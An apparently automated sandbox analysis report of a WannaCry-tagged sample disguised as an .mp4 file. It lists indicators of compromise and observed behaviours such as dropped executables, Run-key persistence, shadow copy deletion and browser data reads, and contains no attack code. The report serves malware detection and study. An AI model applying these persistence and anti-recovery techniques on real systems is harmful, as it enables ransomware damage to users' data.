Malware Analysis Report

2025-01-22 20:09

Sample ID 241016-yam35sybkd
Target shitting slander.mp4
SHA256 0051fa06a995e0daaa5d8d3a6aded51a32975cc3b2e5f38b5a45c3847501958e
Tags
wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0051fa06a995e0daaa5d8d3a6aded51a32975cc3b2e5f38b5a45c3847501958e

Threat Level: Known bad

The file shitting slander.mp4 was found to be: Known bad.

Malicious Activity Summary

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Wannacry

Deletes shadow copies

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Modifies file permissions

Loads dropped DLL

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Adds Run key to start application

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Uses Volume Shadow Copy service COM API

Suspicious use of SetWindowsHookEx

Modifies registry class

Modifies registry key

Modifies data under HKEY_USERS

Interacts with shadow copies

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Views/modifies file attributes

NTFS ADS

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-16 19:35

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-16 19:35

Reported

2024-10-16 19:41

Platform

win10-20240404-en

Max time kernel

386s

Max time network

389s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\shitting slander.mp4"

Signatures

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD5231.tmp C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD5238.tmp C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kxmrwtygyk434 = "\"C:\\Users\\Admin\\Downloads\\RANSOMWARE-WANNACRY-2.0-master\\RANSOMWARE-WANNACRY-2.0-master\\Ransomware.WannaCry\\tasksche.exe\"" C:\Windows\SysWOW64\reg.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\unregmp2.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\421858948\2704036608.pri C:\Windows\system32\LogonUI.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Windows Media Player\setup_wm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\unregmp2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master(1).zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\You-Are-An-Idiot-main.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\System32\unregmp2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\unregmp2.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
